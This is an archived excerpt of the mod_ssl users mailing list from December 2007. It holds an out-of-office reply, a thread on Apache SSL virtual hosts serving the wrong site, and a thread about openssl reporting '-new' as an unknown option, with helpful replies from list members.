          by lfknpsmtp01.CONSOLIDATED.COM (Lotus Domino Release 7.0.2FP2)
          with ESMTP id 2007122610001257-202900 ;
          Wed, 26 Dec 2007 10:00:12 -0600 
Subject: Christa A. Packer/consolidated is out of the office. 
From: Christa.Packer@consolidated.com
To: modssl-users@modssl.org
Message-ID: 
Date: Wed, 26 Dec 2007 10:00:11 -0600
MIME-Version: 1.0
X-MIMETrack: Serialize by Router on mtnmail01/consolidated(Release 7.0.1 HF638|July 30, 2007) at
 12/26/2007 10:00:12 AM,
	Itemize by SMTP Server on lfknpsmtp01/consolidated(Release 7.0.2FP2|May 14, 2007) at
 12/26/2007 10:00:12 AM,
	Serialize by Router on lfknpsmtp01/consolidated(Release 7.0.2FP2|May 14, 2007) at
 12/26/2007 10:01:07 AM,
	Serialize complete at 12/26/2007 10:01:07 AM
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christa.Packer@consolidated.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting  12/22/2007 and will not return until
01/02/2008.

I will be out of the office for the next few days.  I will get back to you
when I return

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 27 22:31:08 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BFF0114DA40; Thu, 27 Dec 2007 22:31:08 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from py-out-1112.google.com (py-out-1112.google.com [64.233.166.179])
	by master.modssl.org (Postfix) with ESMTP id 04A1614D837
	for ; Thu, 27 Dec 2007 22:31:07 +0100 (CET)
Received: by py-out-1112.google.com with SMTP id a25so5774975pyi.11
        for ; Thu, 27 Dec 2007 13:30:48 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type;
        bh=acKRz9pWo2jp2jAfAUt+vPPe3wez1hPsjrvxKzigYO0=;
        b=KLchnZqH5mtdxdK34O7w+uUcJUBy03b6EuXsV+kEMR7W+nHsR8Vw/Iy3DeB3pQmizvnu17mF0ukLwt9ONJ/k3LTYmnJJfEWfqy2veQmiqAKNk6w8tZ0Dhkb+ufiFFI+BE/eClltXtZ+28dvwfM8hEzbdpMD7AHGvxQDTq/okkGA=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:mime-version:content-type;
        b=a7102OI9FMrIiW2dxF16+kzwtCZH7W2kHWFrWivjTTVw1DanOoVzpyximtDordg+Y3DWPj1VQqlknj/tYqhVww8X91EemMJIhraLnGGOlt7KdTej8E5t20NXh9dpb9V1/Q5j/Gk+aMJ5byHxiDrEh1KiBYBP7BZbASB9yVWMZ8E=
Received: by 10.65.242.7 with SMTP id u7mr16229644qbr.14.1198791015991;
        Thu, 27 Dec 2007 13:30:15 -0800 (PST)
Received: by 10.65.122.1 with HTTP; Thu, 27 Dec 2007 13:30:15 -0800 (PST)
Message-ID: <33b00e670712271330t7d2912fex1976756dc9cc2965@mail.gmail.com>
Date: Thu, 27 Dec 2007 15:30:15 -0600
From: "Chris Jordan" 
To: "modssl-users@modssl.org" 
Subject: just installed certificate and I'm getting the wrong site...
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_13121_31140017.1198791015982"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Jordan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_13121_31140017.1198791015982
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi folks,

I'm a complete newbie to this stuff, and I need a little more help.

I'm running apache 2.2.4 on a Fadora Core 6 (2.6.20-1.292.fc6). My first
problem after I installed the certificate is that we apparently had an old
self-signed certificate installed. So, once I figured out that the SSL
directives were in the conf.d/ssl.conf and not in conf/httpd.conf, I was
able to put my certificate information in that file and now our server is
using our real certificate and not the self-signed one.

Our server runs multiple domains using virtual hosting, and I've read
through the archives enough to find out that I can't do named virtual host
with SSL. That's fine. My problem now is that when I browse to:
https://mysecuredomain.com, I'm getting sent to another one of our other
domains  (wrongdomain.com -- for the sake of discussion) except that the URL
in the address bar still says: https://mysecuredomain.com.

I'm confused. I've searched through the archives, but can't seem to find out
how this is happening.

Here's another strange bit. We've got an old version and a newer version of
"wrongdomain.com" and when I  browse to http://wrongdomain.com I get the new
version. When I browse to https://wrongdomain.com I get the *old* version of
the site -- just as I do when I browse to https://mysecuredomain.com...

I hope I'm explaining this well enough. I really need help on how to get
things working properly.

The other thing that I'm curious about is whether we'll be able to secure
any of our other domains hosted from this box in the future if we need to.
>From the reading I've done I'm thinking that's going to be a 'No', but what
if we use the same certificate for all sites? That may be a dumb question,
but again, I'm a genuine newbie here.

My main concern is about the first part of this post... the side question
about multiple domains is less important to me, but I'd still like to know.
I sure hope someone can help me.

Thanks heaps,
Chris


-- 
http://cjordan.us

------=_Part_13121_31140017.1198791015982
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi folks,

I'm a complete newbie to this stuff, and I need a little more help.

I'm running apache 2.2.4 on a Fadora Core 6 (2.6.20-1.292.fc6). My first problem after I installed the certificate is that we apparently had an old self-signed certificate installed. So, once I figured out that the SSL directives were in the 
conf.d/ssl.conf and not in conf/httpd.conf, I was able to put my certificate information in that file and now our server is using our real certificate and not the self-signed one.

Our server runs multiple domains using virtual hosting, and I've read through the archives enough to find out that I can't do named virtual host with SSL. That's fine. My problem now is that when I browse to: 
https://mysecuredomain.com, I'm getting sent to another one of our other domains  (wrongdomain.com -- for the sake of discussion) except that the URL in the address bar still says: 
https://mysecuredomain.com.

I'm confused. I've searched through the archives, but can't seem to find out how this is happening.

Here's another strange bit. We've got an old version and a newer version of "
wrongdomain.com" and when I  browse to http://wrongdomain.com I get the new version. When I browse to https://wrongdomain.com
 I get the *old* version of the site -- just as I do when I browse to https://mysecuredomain.com...

I hope I'm explaining this well enough. I really need help on how to get things working properly.


The other thing that I'm curious about is whether we'll be able to secure any of our other domains hosted from this box in the future if we need to. From the reading I've done I'm thinking that's going to be a 'No', but what if we use the same certificate for all sites? That may be a dumb question, but again, I'm a genuine newbie here.


My main concern is about the first part of this post... the side question about multiple domains is less important to me, but I'd still like to know. I sure hope someone can help me.

Thanks heaps,
Chris





-- 
http://cjordan.us

------=_Part_13121_31140017.1198791015982--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 28 16:41:31 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4452A14DA48; Fri, 28 Dec 2007 16:41:31 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from py-out-1112.google.com (py-out-1112.google.com [64.233.166.183])
	by master.modssl.org (Postfix) with ESMTP id 9066914D858
	for ; Fri, 28 Dec 2007 16:41:30 +0100 (CET)
Received: by py-out-1112.google.com with SMTP id a25so6481011pyi.11
        for ; Fri, 28 Dec 2007 07:41:12 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        bh=9Hep+p0vVYzvPpoTMN6wzsZiGDe0pAfABSuYjIMkUUU=;
        b=LXtqjNC09pj+5Br0Qzts0dvGt47TCfFyWIdlr+AgWaV7GEw3lY5w7NDW4MJ5ZVgjOpDrE5JtLjLFMEwlDJ0toOuTdG+2xs3pz/cb+q7mSq5YHGjIZkGcW+uw1wc1KJP15PHNoGjeXKX1Bnap60WlNqGVTHdSpBMPwLgoxqPckUI=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=o3qxUoKgz1GSU8wiuYjjaVVw6vKK8DMP/qnqd3TU/AOu+RoP7JukpLRzQtEm5myyMJPGGIomMY7+576at1nnPXcdZWvam6BNbt8C/+HKHTEl8NLcK8OyFUpucdfy6gCMlu2K8zT6Gr9IIFuMp3qXnk919c63rlsqxQQWgXuvJ6w=
Received: by 10.64.196.9 with SMTP id t9mr18196675qbf.78.1198856440134;
        Fri, 28 Dec 2007 07:40:40 -0800 (PST)
Received: by 10.65.122.1 with HTTP; Fri, 28 Dec 2007 07:40:40 -0800 (PST)
Message-ID: <33b00e670712280740o7ba793b7q3dfd54d8d33cd788@mail.gmail.com>
Date: Fri, 28 Dec 2007 09:40:40 -0600
From: "Chris Jordan" 
To: "modssl-users@modssl.org" 
Subject: Re: just installed certificate and I'm getting the wrong site...
In-Reply-To: <33b00e670712271330t7d2912fex1976756dc9cc2965@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_15031_24567369.1198856440133"
References: <33b00e670712271330t7d2912fex1976756dc9cc2965@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Jordan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_15031_24567369.1198856440133
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Sorry for bumping my own post, but I'm really in need of help here. I'm at a
loss. Maybe it's because folks are on holiday given the time of year, but if
anyone thinks they can help, I'd very much appreciate it. :o)

Thanks,
Chris

On Dec 27, 2007 3:30 PM, Chris Jordan  wrote:

> Hi folks,
>
> I'm a complete newbie to this stuff, and I need a little more help.
>
> I'm running apache 2.2.4 on a Fadora Core 6 (2.6.20-1.292.fc6). My first
> problem after I installed the certificate is that we apparently had an old
> self-signed certificate installed. So, once I figured out that the SSL
> directives were in the conf.d/ssl.conf and not in conf/httpd.conf, I was
> able to put my certificate information in that file and now our server is
> using our real certificate and not the self-signed one.
>
> Our server runs multiple domains using virtual hosting, and I've read
> through the archives enough to find out that I can't do named virtual host
> with SSL. That's fine. My problem now is that when I browse to:
> https://mysecuredomain.com, I'm getting sent to another one of our other
> domains  (wrongdomain.com -- for the sake of discussion) except that the
> URL in the address bar still says: https://mysecuredomain.com.
>
> I'm confused. I've searched through the archives, but can't seem to find
> out how this is happening.
>
> Here's another strange bit. We've got an old version and a newer version
> of " wrongdomain.com" and when I  browse to http://wrongdomain.com I get
> the new version. When I browse to https://wrongdomain.com I get the *old*
> version of the site -- just as I do when I browse to
> https://mysecuredomain.com...
>
> I hope I'm explaining this well enough. I really need help on how to get
> things working properly.
>
> The other thing that I'm curious about is whether we'll be able to secure
> any of our other domains hosted from this box in the future if we need to.
> From the reading I've done I'm thinking that's going to be a 'No', but what
> if we use the same certificate for all sites? That may be a dumb question,
> but again, I'm a genuine newbie here.
>
> My main concern is about the first part of this post... the side question
> about multiple domains is less important to me, but I'd still like to know.
> I sure hope someone can help me.
>
> Thanks heaps,
> Chris
>
>
> --
> http://cjordan.us




-- 
http://cjordan.us

------=_Part_15031_24567369.1198856440133
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Sorry for bumping my own post, but I'm really in need of help here. I'm at a loss. Maybe it's because folks are on holiday given the time of year, but if anyone thinks they can help, I'd very much appreciate it. :o)


Thanks,
Chris

On Dec 27, 2007 3:30 PM, Chris Jordan <chris.s.jordan@gmail.com> wrote:

Hi folks,

I'm a complete newbie to this stuff, and I need a little more help.

I'm running apache 2.2.4 on a Fadora Core 6 (2.6.20-1.292.fc6). My first problem after I installed the certificate is that we apparently had an old self-signed certificate installed. So, once I figured out that the SSL directives were in the 
conf.d/ssl.conf and not in conf/httpd.conf, I was able to put my certificate information in that file and now our server is using our real certificate and not the self-signed one.

Our server runs multiple domains using virtual hosting, and I've read through the archives enough to find out that I can't do named virtual host with SSL. That's fine. My problem now is that when I browse to: 
https://mysecuredomain.com, I'm getting sent to another one of our other domains  (wrongdomain.com -- for the sake of discussion) except that the URL in the address bar still says: 
https://mysecuredomain.com.

I'm confused. I've searched through the archives, but can't seem to find out how this is happening.

Here's another strange bit. We've got an old version and a newer version of "
wrongdomain.com" and when I  browse to http://wrongdomain.com I get the new version. When I browse to 
https://wrongdomain.com
 I get the *old* version of the site -- just as I do when I browse to https://mysecuredomain.com...

I hope I'm explaining this well enough. I really need help on how to get things working properly.


The other thing that I'm curious about is whether we'll be able to secure any of our other domains hosted from this box in the future if we need to. From the reading I've done I'm thinking that's going to be a 'No', but what if we use the same certificate for all sites? That may be a dumb question, but again, I'm a genuine newbie here.


My main concern is about the first part of this post... the side question about multiple domains is less important to me, but I'd still like to know. I sure hope someone can help me.

Thanks heaps,
Chris





-- 
http://cjordan.us




-- 
http://cjordan.us

------=_Part_15031_24567369.1198856440133--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 28 17:19:53 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E8A7214DA46; Fri, 28 Dec 2007 17:19:52 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from n6.bullet.mud.yahoo.com (n6.bullet.mud.yahoo.com [216.252.100.57])
	by master.modssl.org (Postfix) with SMTP id E463414D858
	for ; Fri, 28 Dec 2007 17:19:50 +0100 (CET)
Received: from [68.142.194.243] by n6.bullet.mud.yahoo.com with NNFMP; 28 Dec 2007 16:19:35 -0000
Received: from [209.191.119.173] by t1.bullet.mud.yahoo.com with NNFMP; 28 Dec 2007 16:19:35 -0000
Received: from [127.0.0.1] by omp104.mail.mud.yahoo.com with NNFMP; 28 Dec 2007 16:19:35 -0000
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 944665.95828.bm@omp104.mail.mud.yahoo.com
Received: (qmail 16930 invoked by uid 60001); 28 Dec 2007 16:19:34 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.co.uk;
  h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=OGHb/IBdJVBly6LjVxl9vXPWKiL1zzjLAv5PZmcJJDnQbvCvNm5rN0pIJTkblAKLcb/hmUWqrBu5q6aiRl565PwxgSeXU9yNROy3ZaDcDXDpU0dWf3waWuw8Rg7RvxK8xE6Uj81CBjwTSgb96OzWCkLgQ4DtiohizRhzo+mlGy8=;
X-YMail-OSG: d3hu09YVM1kyrlR90swoI7pn7s8cfwftqoLj9..8h1YOaoV46JWimRrHHG0Hj9r0SQVr6eaxmL4JDNb4wVnaM1T.L22oXPxrcmOeg45XGnbXrakZ
Received: from [86.3.218.116] by web25803.mail.ukl.yahoo.com via HTTP; Fri, 28 Dec 2007 08:19:34 PST
Date: Fri, 28 Dec 2007 08:19:34 -0800 (PST)
From: Glyn Astill 
Subject: Re: just installed certificate and I'm getting the wrong site...
To: modssl-users@modssl.org
In-Reply-To: <33b00e670712280740o7ba793b7q3dfd54d8d33cd788@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <596924.15896.qm@web25803.mail.ukl.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glyn Astill 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Chris,

This sounds to me like more of an apache configuration problem.
Perhaps if you posted some bits of your httpd.conf someone could spot
the problem.

Could you clarify on the old and new versions of wrongdomain.com? Are
both still present on your server with the old one residing in
another directory?

It sounds to me like when you come through to your server from
mysecuredomain.com, via https you come through to the first virtual
directory / host whioch is wrondomain.com, because they're both on
the same IP. What happens if you switch the order of your virtual
hosts, do you come through to a different site?

I'd be switching my conf files about to experiment and see what
happens in order to figure out the problem.

Glyn 


--- Chris Jordan  wrote:

> Sorry for bumping my own post, but I'm really in need of help here.
> I'm at a
> loss. Maybe it's because folks are on holiday given the time of
> year, but if
> anyone thinks they can help, I'd very much appreciate it. :o)
> 
> Thanks,
> Chris
> 
> On Dec 27, 2007 3:30 PM, Chris Jordan 
> wrote:
> 
> > Hi folks,
> >
> > I'm a complete newbie to this stuff, and I need a little more
> help.
> >
> > I'm running apache 2.2.4 on a Fadora Core 6 (2.6.20-1.292.fc6).
> My first
> > problem after I installed the certificate is that we apparently
> had an old
> > self-signed certificate installed. So, once I figured out that
> the SSL
> > directives were in the conf.d/ssl.conf and not in
> conf/httpd.conf, I was
> > able to put my certificate information in that file and now our
> server is
> > using our real certificate and not the self-signed one.
> >
> > Our server runs multiple domains using virtual hosting, and I've
> read
> > through the archives enough to find out that I can't do named
> virtual host
> > with SSL. That's fine. My problem now is that when I browse to:
> > https://mysecuredomain.com, I'm getting sent to another one of
> our other
> > domains  (wrongdomain.com -- for the sake of discussion) except
> that the
> > URL in the address bar still says: https://mysecuredomain.com.
> >
> > I'm confused. I've searched through the archives, but can't seem
> to find
> > out how this is happening.
> >
> > Here's another strange bit. We've got an old version and a newer
> version
> > of " wrongdomain.com" and when I  browse to
> http://wrongdomain.com I get
> > the new version. When I browse to https://wrongdomain.com I get
> the *old*
> > version of the site -- just as I do when I browse to
> > https://mysecuredomain.com...
> >
> > I hope I'm explaining this well enough. I really need help on how
> to get
> > things working properly.
> >
> > The other thing that I'm curious about is whether we'll be able
> to secure
> > any of our other domains hosted from this box in the future if we
> need to.
> > From the reading I've done I'm thinking that's going to be a
> 'No', but what
> > if we use the same certificate for all sites? That may be a dumb
> question,
> > but again, I'm a genuine newbie here.
> >
> > My main concern is about the first part of this post... the side
> question
> > about multiple domains is less important to me, but I'd still
> like to know.
> > I sure hope someone can help me.
> >
> > Thanks heaps,
> > Chris
> >
> >
> > --
> > http://cjordan.us
> 
> 
> 
> 
> -- 
> http://cjordan.us
> 



      __________________________________________________________
Sent from Yahoo! Mail - a smarter inbox http://uk.mail.yahoo.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 28 17:23:56 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 250F614DA4B; Fri, 28 Dec 2007 17:23:56 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from n6.bullet.ukl.yahoo.com (n6.bullet.ukl.yahoo.com [217.146.182.183])
	by master.modssl.org (Postfix) with SMTP id B4B8E14D858
	for ; Fri, 28 Dec 2007 17:23:55 +0100 (CET)
Received: from [217.12.4.214] by n6.bullet.ukl.yahoo.com with NNFMP; 28 Dec 2007 16:23:42 -0000
Received: from [216.252.122.218] by t1.bullet.ukl.yahoo.com with NNFMP; 28 Dec 2007 16:23:42 -0000
Received: from [69.147.65.153] by t3.bullet.sp1.yahoo.com with NNFMP; 28 Dec 2007 16:23:41 -0000
Received: from [127.0.0.1] by omp401.mail.sp1.yahoo.com with NNFMP; 28 Dec 2007 16:23:41 -0000
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 854794.22148.bm@omp401.mail.sp1.yahoo.com
Received: (qmail 74739 invoked by uid 60001); 28 Dec 2007 16:23:41 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=5viPFjNyyXuibh+lckJwgdoe+5WkPuCynuZia9xb7woQnoiTG2yXcWfEvwAoXRbUJcBuORr12vuLDz4wKhjn/SLH46hQs6+5msRg/sx6zBwop5cYc77DwxJA1duzg8Av7jhmE8DaEHZT7217vPMbdiKXgd7hQAX7aYMXLpmpXyg=;
X-YMail-OSG: ciqCIusVM1nNL873fRC4D4uchYioLtq1ac3q3KBF
Received: from [192.88.165.35] by web43135.mail.sp1.yahoo.com via HTTP; Fri, 28 Dec 2007 08:23:41 PST
Date: Fri, 28 Dec 2007 08:23:41 -0800 (PST)
From: Orville Weyrich - KD7HJV 
Subject: Re: just installed certificate and I'm getting the wrong site...
To: modssl-users@modssl.org
In-Reply-To: <33b00e670712271330t7d2912fex1976756dc9cc2965@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <635656.73890.qm@web43135.mail.sp1.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Orville Weyrich - KD7HJV 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>From your description it sounds like you have a
virtual host defining the new version of
wrongdomain.com plus you have a global definition of
the old version of wrongdomain.com.

Then it sounds like you have not specified the data
location inside the virtual host where you define
mysecuredomain.com, so that you are picking up the
global definition.

Cure in this scenario is to override the global
configuration information inside the virtual host for
mysecuredomain.com (or if you do not have a virtual
host for mysecuredomain.com, create one).

As for the problem of https://wrongdomain.com
responding, recall that there can be only one port 443
per ip address, and Apache does not look at domain
names in deciding to serve https, only the ip address.

Cure: I think you can use rewrite rules to direct
traffic addressed to https://wrongdomain.com to a
"safe" directory (I have not tried this).  Or see
below.

As for serving more than one secure web site from a
single computer, yes you can do this, but recall the
limit of one port 443 per ip address.  

You can either arrange for your computer to have
multiple ip addresses (add multiple NIC cards or dink
around with the ifconfig or other etc files depending
on your flavor of Unixoid OS), and then run multiple
instances of Apache listening on different ip
addresses.  Be sure that your separate instances of
Apache define different locations for their
housekeeping files. This will also solve your
https://wrongdomain.com problem.

Or, you can use a port other than 443 for https with a
single ip address, but this is ugly if the user has to
type in the URL.  Not sure if a single instance of
Apache can handle two different secure ports in
different virtual hosts, but you certainly can use
separate instances of Apache on the same box.

Regards,

orville

www.weyrich.com

--- Chris Jordan  wrote:

> Hi folks,
> 
> I'm a complete newbie to this stuff, and I need a
> little more help.
> 
> I'm running apache 2.2.4 on a Fadora Core 6
> (2.6.20-1.292.fc6). My first
> problem after I installed the certificate is that we
> apparently had an old
> self-signed certificate installed. So, once I
> figured out that the SSL
> directives were in the conf.d/ssl.conf and not in
> conf/httpd.conf, I was
> able to put my certificate information in that file
> and now our server is
> using our real certificate and not the self-signed
> one.
> 
> Our server runs multiple domains using virtual
> hosting, and I've read
> through the archives enough to find out that I can't
> do named virtual host
> with SSL. That's fine. My problem now is that when I
> browse to:
> https://mysecuredomain.com, I'm getting sent to
> another one of our other
> domains  (wrongdomain.com -- for the sake of
> discussion) except that the URL
> in the address bar still says:
> https://mysecuredomain.com.
> 
> I'm confused. I've searched through the archives,
> but can't seem to find out
> how this is happening.
> 
> Here's another strange bit. We've got an old version
> and a newer version of
> "wrongdomain.com" and when I  browse to
> http://wrongdomain.com I get the new
> version. When I browse to https://wrongdomain.com I
> get the *old* version of
> the site -- just as I do when I browse to
> https://mysecuredomain.com...
> 
> I hope I'm explaining this well enough. I really
> need help on how to get
> things working properly.
> 
> The other thing that I'm curious about is whether
> we'll be able to secure
> any of our other domains hosted from this box in the
> future if we need to.
> From the reading I've done I'm thinking that's going
> to be a 'No', but what
> if we use the same certificate for all sites? That
> may be a dumb question,
> but again, I'm a genuine newbie here.
> 
> My main concern is about the first part of this
> post... the side question
> about multiple domains is less important to me, but
> I'd still like to know.
> I sure hope someone can help me.
> 
> Thanks heaps,
> Chris
> 
> 
> -- 
> http://cjordan.us
> 



      ____________________________________________________________________________________
Be a better friend, newshound, and 
know-it-all with Yahoo! Mobile.  Try it now.  http://mobile.yahoo.com/;_ylt=Ahu06i62sR8HDtDypao8Wcj9tAcJ 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 28 22:19:48 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DF7C614DA48; Fri, 28 Dec 2007 22:19:48 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mx1.werum.de (mx1.werum.de [62.156.157.70])
	by master.modssl.org (Postfix) with ESMTP id 848A714D858
	for ; Fri, 28 Dec 2007 22:19:48 +0100 (CET)
Received: from werum815.werum.net (mailsmtp1.werum.net [172.20.104.15])
	by mx1.werum.de (Postfix) with ESMTP id D861E31AA00
	for ; Fri, 28 Dec 2007 22:19:26 +0100 (CET)
Received: from localhost (content-scanner.mail.werum.net [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 58E5D9344A;
	Fri, 28 Dec 2007 22:19:22 +0100 (CET)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 03280-06; Fri, 28 Dec 2007 22:10:58 +0100 (CET)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id CA91F93444
	for ; Fri, 28 Dec 2007 22:19:21 +0100 (CET)
Message-ID: <4775685D.1050902@werum.de>
Date: Fri, 28 Dec 2007 22:19:25 +0100
From: Eckard Wille 
User-Agent: Thunderbird 2.0.0.9 (Windows/20071031)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: opensll req -new:  unkown option -new!?
References: <00b401c847d7$32384b70$9100000a@E510>
In-Reply-To: <00b401c847d7$32384b70$9100000a@E510>
X-Enigmail-Version: 0.95.5
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-3.885 tagged_above=-999 required=3 tests=ALL_TRUSTED,
 BAYES_00, PLING_QUERY
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Eric Wood schrieb:
> My cert expired so I'm trying to renew.  Because the Organizational
> Unit field is now required, I'm trying to recreate a new CSR from
> my existing key:
> 
> # openssl req -new -key www.xyz.com.key -out www.xyz.com.csr 
> unknown option -new ........ etc.
> 
> I'm running FC6 with latest openssl-0.9.8b-15.fc6.   I'm totally
> perplexed as to why -new is an unknown option.  Any ideas?


Hi Eric,

perhaps the "-" has not the required ascii code. Did you copy that
command from a website? Some fellows use long minus signs for better
readability, so give it another try by typing the command line by hand.

Greetings from Germany,
Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 28 22:29:46 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 495A414DA48; Fri, 28 Dec 2007 22:29:46 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from repulse.cnchost.com (repulse.cnchost.com [207.155.248.4])
	by master.modssl.org (Postfix) with ESMTP id AF72314D858
	for ; Fri, 28 Dec 2007 22:29:45 +0100 (CET)
Received: from INKSTER5 (unknown [65.246.187.130])
	(Authenticated sender: mdickau@byallaccounts.com)
	by repulse.cnchost.com (ConcentricHost(2.60) Relay) with ESMTP id E66BE383A
	for ; Fri, 28 Dec 2007 16:29:30 -0500 (EST)
Message-ID: <012901c84998$bbb38460$3d00000a@woburn.com>
From: "Martin Dickau" 
To: 
References: <00b401c847d7$32384b70$9100000a@E510> <4775685D.1050902@werum.de>
Subject: Re: opensll req -new:  unkown option -new!?
Date: Fri, 28 Dec 2007 16:29:28 -0500
Organization: ByAllAccounts
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3198
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Martin Dickau" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I found it does this if it cannot find openssl.cnf.  You can tell it where 
the file is via the -config  switch.

Regards,

Martin

----- Original Message ----- 
From: "Eckard Wille" 
To: 
Sent: Friday, December 28, 2007 4:19 PM
Subject: Re: opensll req -new: unkown option -new!?


> Eric Wood schrieb:
>> My cert expired so I'm trying to renew.  Because the Organizational
>> Unit field is now required, I'm trying to recreate a new CSR from
>> my existing key:
>>
>> # openssl req -new -key www.xyz.com.key -out www.xyz.com.csr
>> unknown option -new ........ etc.
>>
>> I'm running FC6 with latest openssl-0.9.8b-15.fc6.   I'm totally
>> perplexed as to why -new is an unknown option.  Any ideas?
>
